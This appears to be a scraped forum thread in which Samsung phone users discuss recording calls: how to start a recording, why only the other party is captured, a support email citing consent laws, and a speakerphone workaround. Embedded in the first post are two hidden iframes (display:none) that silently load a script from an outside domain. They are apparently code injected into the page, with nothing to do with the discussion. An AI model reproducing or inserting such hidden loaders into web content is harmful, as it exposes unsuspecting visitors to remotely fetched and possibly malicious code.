+ Reply to Thread

Recording phone conversations....

noticed that when recording a phone conversation only the person your talking to is recorded.... not your voice....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

How do you record a conversation? I'll try it if you tell me how and will report back to you.

How to record a conversation

During a conversation simply press and hold the top button on the left side of the phone (the one with the two circles with a line on top of them). After a moment or so the phone will begin to record the conversation.

To record a remonder for yourself follow the same steps as above except when you are not on the phone.

I have also noticed that when recording a phone call, you can only record the person on the other line and not yourself.

Thanks for the info - I also got 1 side of the conversation.

I actually had to use this feature today when someone was telling me a telephone number while I was driving and could not write it down. Very useful feature but I would find it more useful if I could have heard myself also.

I informed Samsung Tech support and they told me that it will never be able to record both sides of the conversation. Here's why (in an email they sent me):

Samsung can't authorize recording conversations that is not legal to do unless you inform the caller that the conversation is being recorded. That will not be changed because of the legalities. The service is primarily used for a reference, ie, directions, etc.

Sincerely,
    Samtech083
    Wireless Technical Support Group

try recording while using the speakerphone...

Brooks